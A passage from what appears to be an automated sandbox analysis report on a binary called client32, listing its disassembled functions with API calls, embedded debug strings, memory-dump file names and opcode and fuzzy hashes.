                                                                                                                                                                • Instruction ID: 208af751730b9df0a36513b51cfb93f89bd03d9f93b9dbce85b9ce09b73d059e
                                                                                                                                                                • Opcode Fuzzy Hash: d53aa28a4ccfb8e13cf20ea598e1f96ded17236a1d9ba3be30e792c9697d6fb3
                                                                                                                                                                • Instruction Fuzzy Hash: 465181746001159FD710DB68CC90F9AB7F9BF88708F108698F6599B391DB70ED45CBA0
                                                                                                                                                                Function 1104D7C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncpy
                                                                                                                                                                • String ID: Client.
                                                                                                                                                                • API String ID: 2961919466-3668916897
                                                                                                                                                                • Opcode ID: 160051c5169f4dce364570e961c6b97a737e2e0f2d898daf7830f54137779bf2
                                                                                                                                                                • Instruction ID: 82f9fb5274c218f2e2933d4268d430b101317fb5d5a42cfe602e4bd828547544
                                                                                                                                                                • Opcode Fuzzy Hash: 160051c5169f4dce364570e961c6b97a737e2e0f2d898daf7830f54137779bf2
                                                                                                                                                                • Instruction Fuzzy Hash: 5B41A675E00259AFD710CF78C884BEEBBF9EF59314F1445A9D808E7641E771AA04CBA0
                                                                                                                                                                Function 11019590 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110196BA
                                                                                                                                                                Strings
                                                                                                                                                                • vector<T> too long, xrefs: 110196B5
                                                                                                                                                                • !"NOT IMPLEMENTED", xrefs: 110196CA
                                                                                                                                                                • ..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp, xrefs: 110196C5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                • String ID: !"NOT IMPLEMENTED"$..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp$vector<T> too long
                                                                                                                                                                • API String ID: 909987262-1355409292
                                                                                                                                                                • Opcode ID: d87c083aec0ae9037ab654dc61d70b8012f9b8a43bc405ad0ad5b6ebd6bfac61
                                                                                                                                                                • Instruction ID: 438e451cb70dd1c72efd7501f0ab98eb26d93f4da065d7170961cfbefb2eaf2c
                                                                                                                                                                • Opcode Fuzzy Hash: d87c083aec0ae9037ab654dc61d70b8012f9b8a43bc405ad0ad5b6ebd6bfac61
                                                                                                                                                                • Instruction Fuzzy Hash: 6041A775F006064BCB1CCF68CC919AEB7E5E788619B144F3ED817D7688F634E901C661
                                                                                                                                                                Function 11041470 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 110415C2
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 110415D0
                                                                                                                                                                Strings
                                                                                                                                                                • Info. Set Volume, Locked %d, Volume %d, Max volume %d, xrefs: 11041522
                                                                                                                                                                • d, xrefs: 110415D8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                • String ID: Info. Set Volume, Locked %d, Volume %d, Max volume %d$d
                                                                                                                                                                • API String ID: 3728558374-2833518301
                                                                                                                                                                • Opcode ID: 2d3c5753cfcd35abeb2b38ece45fb291adc93ba9b22e4e0b0cc3dc539a5c0659
                                                                                                                                                                • Instruction ID: ed9d0dea6f5f9d8371ff7772f9706d7f17cf0ebfa83a5406c0ffc32767b54f24
                                                                                                                                                                • Opcode Fuzzy Hash: 2d3c5753cfcd35abeb2b38ece45fb291adc93ba9b22e4e0b0cc3dc539a5c0659
                                                                                                                                                                • Instruction Fuzzy Hash: A541D3B5E0060ADFCB04DF94C890AFEF7B9FF48714F248259E416A7650EB346A45CBA0
                                                                                                                                                                Function 11117000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$DeleteObject
                                                                                                                                                                • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                                                                                                • API String ID: 3011517232-3209293507
                                                                                                                                                                • Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                                                                                                • Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
                                                                                                                                                                • Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                                                                                                • Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
                                                                                                                                                                Function 11077200 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11077241
                                                                                                                                                                • CopyRect.USER32(?,00000004), ref: 1107726F
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077229
                                                                                                                                                                • m_hWnd, xrefs: 1107722E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2755825785-2830328467
                                                                                                                                                                • Opcode ID: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
                                                                                                                                                                • Instruction ID: de278a2cd4c0b5f0839ddad857aefe36ed68345845b5ae66c69d21e7740d687e
                                                                                                                                                                • Opcode Fuzzy Hash: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
                                                                                                                                                                • Instruction Fuzzy Hash: 3841A331E00A06DBCB14CE68C9C8A5EF7F1FF84344F10C569E86597644EB30E941CB58
                                                                                                                                                                Function 11031490 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 104COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                • Exit Win10 Start screen (%s), xrefs: 110314E6
                                                                                                                                                                • Error. WindowsD not generated, xrefs: 11031592
                                                                                                                                                                • Error. ExitMetro code cannot init kbfilter, xrefs: 11031579
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle_memset$ClassCodeCursorExitFromNameObjectOpenPointProcessSingleVersionWaitWindow_strncpywsprintf
                                                                                                                                                                • String ID: Error. ExitMetro code cannot init kbfilter$Error. WindowsD not generated$Exit Win10 Start screen (%s)
                                                                                                                                                                • API String ID: 2171401249-3225996774
                                                                                                                                                                • Opcode ID: 62f961d9fac91cbabdff2b102d703fb8ceba0662e6fd2ba6f82ae67eccb203d8
                                                                                                                                                                • Instruction ID: ccd051d7305efa45e343e075a4b0b177443abffe8ba45bd3bfa9cf8fd8a66105
                                                                                                                                                                • Opcode Fuzzy Hash: 62f961d9fac91cbabdff2b102d703fb8ceba0662e6fd2ba6f82ae67eccb203d8
                                                                                                                                                                • Instruction Fuzzy Hash: 5031E87AE18619DFEB11CFA4AC017ADB7B4DB48A19F0442AADC26536C0EB316904C7D1
                                                                                                                                                                Function 1109B5F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1109B671
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1109B686
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$ErrorException@8ExitLastMessageProcessThrow_malloc_memsetstd::exception::exception
                                                                                                                                                                • String ID: ..\CTL32\IEFavourites.cpp$IsA()
                                                                                                                                                                • API String ID: 718578146-3791668299
                                                                                                                                                                • Opcode ID: fc21dcdb6ffeba61cbd6f2c5d28e25d0cd18af64b2fb39d35a095f5ac3d38a21
                                                                                                                                                                • Instruction ID: a25e5e8df4ba3542d3730a7f5bbf6fd392d61f4fcc93709a443f3569d7e07fc3
                                                                                                                                                                • Opcode Fuzzy Hash: fc21dcdb6ffeba61cbd6f2c5d28e25d0cd18af64b2fb39d35a095f5ac3d38a21
                                                                                                                                                                • Instruction Fuzzy Hash: 2231E6B5D0461AABC710CF99DC80B9EFBF8FF18214F80856EE959A7340E7756504CB90
                                                                                                                                                                Function 11059760 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                • String ID: Stop reconn to %s
                                                                                                                                                                • API String ID: 536389180-2663412807
                                                                                                                                                                • Opcode ID: aae6b297b8c7916bcbe50019fe196bd0f541e6307e3a713ee4deb62ca464ceb8
                                                                                                                                                                • Instruction ID: 8acbe8f22c4af59d4f8e944e94e0264762def9f03065f5921db6513219838372
                                                                                                                                                                • Opcode Fuzzy Hash: aae6b297b8c7916bcbe50019fe196bd0f541e6307e3a713ee4deb62ca464ceb8
                                                                                                                                                                • Instruction Fuzzy Hash: 78318335E002099FDB60CF79C980A6AB7F9FF89314F1046AED45AC7684EB31E944CB50
                                                                                                                                                                Function 110D1090 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memmove.LIBCMT ref: 110D1128
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                                                                • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                                                                                • API String ID: 1528188558-323366856
                                                                                                                                                                • Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                                                                                                • Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
